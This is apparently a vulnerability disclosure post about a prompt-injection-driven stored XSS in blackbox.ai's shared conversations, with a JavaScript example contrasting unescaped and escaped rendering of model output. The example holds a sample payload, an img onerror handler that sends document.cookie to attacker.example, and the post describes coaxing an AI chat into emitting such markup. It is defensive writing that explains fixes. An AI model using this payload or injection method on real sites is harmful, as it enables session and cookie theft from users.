Tuesday, December 16, 2025

blackbox.ai stored XSS vulnerability

A prompt-injection-driven stored cross-site scripting (XSS) vulnerability was found in blackbox.ai. An attacker can get XSS markup stored in a conversation and then share that conversation with a victim; when the victim opens the shared link, the script runs in the context of https://www.blackbox.ai and can steal the victim's cookies while their browser is authenticated to the site.

https://www.blackbox.ai/share/576066de-6268-4dbd-8c51-3dd509eadba4
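To make the failure mode concrete, the following is an added example of the rendering bug that produces this class of stored XSS in a chat UI; it is not blackbox.ai's code, and the function names, the constructed assistant reply and the attacker hostname are assumptions. It contrasts a renderer that interpolates model output into HTML unescaped with one that escapes it, and includes a crude check for surviving active markup.

```javascript
// Added example, not blackbox.ai's code: how a chat UI that injects model
// output as raw HTML turns a prompt-injected reply into stored XSS, and the
// escaping fix. Function names, the sample reply and the hostname are assumptions.

// Constructed sample: an assistant reply that a prompt injection coerced the
// model into emitting. The markup is a generic XSS probe (attacker.example is
// a placeholder host), not a real exploit against any site.
const INJECTED_REPLY =
  'Sure! Here is your answer.' +
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Minimal HTML escaping for text nodes and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: model text is interpolated into HTML unescaped. If this string is
// assigned to innerHTML when a shared conversation is re-rendered in the
// victim's browser, the onerror handler executes with the site's cookies.
function renderMessageUnsafe(text) {
  return `<div class="msg">${text}</div>`;
}

// Hardened: escape the text so the browser shows the payload as literal characters.
function renderMessageSafe(text) {
  return `<div class="msg">${escapeHtml(text)}</div>`;
}

// Crude check used to demonstrate the difference: does the rendered HTML still
// contain a <script> tag or an element carrying an on* event-handler attribute?
function containsActiveMarkup(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe active markup:', containsActiveMarkup(renderMessageUnsafe(INJECTED_REPLY)));
console.log('safe   active markup:', containsActiveMarkup(renderMessageSafe(INJECTED_REPLY)));
```

Escaping is the right fix when the reply is shown as plain text. If the UI needs to render markdown or a subset of HTML, the output of the markdown renderer must go through a DOM-based sanitizer before it reaches innerHTML, and a Content-Security-Policy that forbids inline script blocks the onerror handler even if sanitization slips. Marking session cookies HttpOnly keeps document.cookie from exposing them, which limits the cookie theft described above but does not stop the script from acting on the victim's behalf.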




This was reported to gisele@blackbox.ai on October 2, 2025. They initially responded and said they would check on it. However, in spite of a series of consistent follow-ups, I never heard from them again.